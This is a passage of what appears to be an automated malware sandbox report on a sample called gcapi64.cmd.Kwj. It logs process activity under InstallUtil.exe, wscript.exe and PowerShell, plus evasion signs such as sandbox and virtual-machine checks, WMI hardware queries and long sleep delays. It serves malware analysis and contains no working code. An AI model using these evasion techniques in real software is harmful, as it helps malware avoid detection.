                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Powershell is started from unusual location (likely to bypass HIPS)
                    Source: c:\users\user\desktop\gcapi64.cmd.kwjKey value queried: Powershell behaviorJump to behavior
                    Source: c:\users\user\appdata\roaming\gcapi64.cmd.kwjKey value queried: Powershell behavior
                    Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: gcapi64.cmd.Kwj, 00000005.00000002.1852130887.00000258253A8000.00000004.00000800.00020000.00000000.sdmp, gcapi64.cmd.Kwj, 00000014.00000002.2107099890.00000183ABDA2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjMemory allocated: 25823480000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjMemory allocated: 25823480000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeMemory allocated: 16B87430000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeMemory allocated: 16BA0F60000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjMemory allocated: 183AB5E0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjMemory allocated: 183AB5E0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeMemory allocated: 1C9C5AC0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeMemory allocated: 1C9DDC20000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjCode function: 5_2_00007FFD9B790E8E sldt word ptr [eax]5_2_00007FFD9B790E8E
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeThread delayed: delay time: 180000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjWindow / User API: threadDelayed 4881Jump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.KwjWindow / User API: threadDelayed 4889Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6807Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2789Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 3895Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 5888Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjWindow / User API: threadDelayed 6009
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.KwjWindow / User API: threadDelayed 2768
                    Source: C:\Users\user\Desktop\gcapi64.cmd.Kwj TID: 7600Thread sleep count: 4881 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.Kwj TID: 7604Thread sleep count: 4889 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\gcapi64.cmd.Kwj TID: 7660Thread sleep time: -13835058055282155s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7876Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe TID: 8144Thread sleep time: -24903104499507879s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe TID: 8144Thread sleep time: -180000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe TID: 8144Thread sleep time: -59869s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe TID: 8144Thread sleep time: -59746s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe TID: 8144Thread sleep time: -59631s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe TID: 8144Thread sleep time: -59500s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe TID: 8144Thread sleep time: -59389s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe TID: 8144Thread sleep time: -59275s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe TID: 8144Thread sleep time: -59166s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe TID: 8144Thread sleep time: -59047s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe TID: 8144Thread sleep time: -58922s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe TID: 8144Thread sleep time: -58812s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe TID: 8144Thread sleep time: -58703s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe TID: 8144Thread sleep time: -58590s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe TID: 8144Thread sleep time: -58484s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe TID: 8060Thread sleep time: -360000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe TID: 8144Thread sleep time: -59861s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe TID: 8144Thread sleep time: -59721s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe TID: 8144Thread sleep time: -59596s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe TID: 8144Thread sleep time: -59471s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe TID: 8144Thread sleep time: -59357s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe TID: 8144Thread sleep time: -59236s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe TID: 8144Thread sleep time: -59092s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe TID: 8144Thread sleep time: -58961s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe TID: 8144Thread sleep time: -58827s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe TID: 8144Thread sleep time: -58502s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe TID: 8144Thread sleep time: -58307s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe TID: 8144Thread sleep time: -58190s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe TID: 8144Thread sleep time: -58065s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe TID: 8144Thread sleep time: -57940s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe TID: 8144Thread sleep time: -57815s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe TID: 8144Thread sleep time: -57690s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe TID: 8144Thread sleep time: -59887s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe TID: 8144Thread sleep time: -59781s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe TID: 8144Thread sleep time: -59671s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe TID: 8144Thread sleep time: -59562s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe TID: 8144Thread sleep time: -59445s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe TID: 8144Thread sleep time: -59328s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe TID: 8144Thread sleep time: -59219s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe TID: 8144Thread sleep time: -59094s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe TID: 8144Thread sleep time: -58984s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe TID: 8144Thread sleep time: -58859s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe TID: 8144Thread sleep time: -58745s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe TID: 8144Thread sleep time: -58625s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe TID: 8144Thread sleep time: -58515s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe TID: 8144Thread sleep time: -58406s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe TID: 8144Thread sleep time: -58296s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe TID: 8144Thread sleep time: -58187s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe TID: 8144Thread sleep time: -58076s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe TID: 8144Thread sleep time: -57968s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.Kwj TID: 7512Thread sleep count: 6009 > 30
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.Kwj TID: 7664Thread sleep time: -17524406870024063s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\gcapi64.cmd.Kwj TID: 7500Thread sleep count: 2768 > 30
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe TID: 1016Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
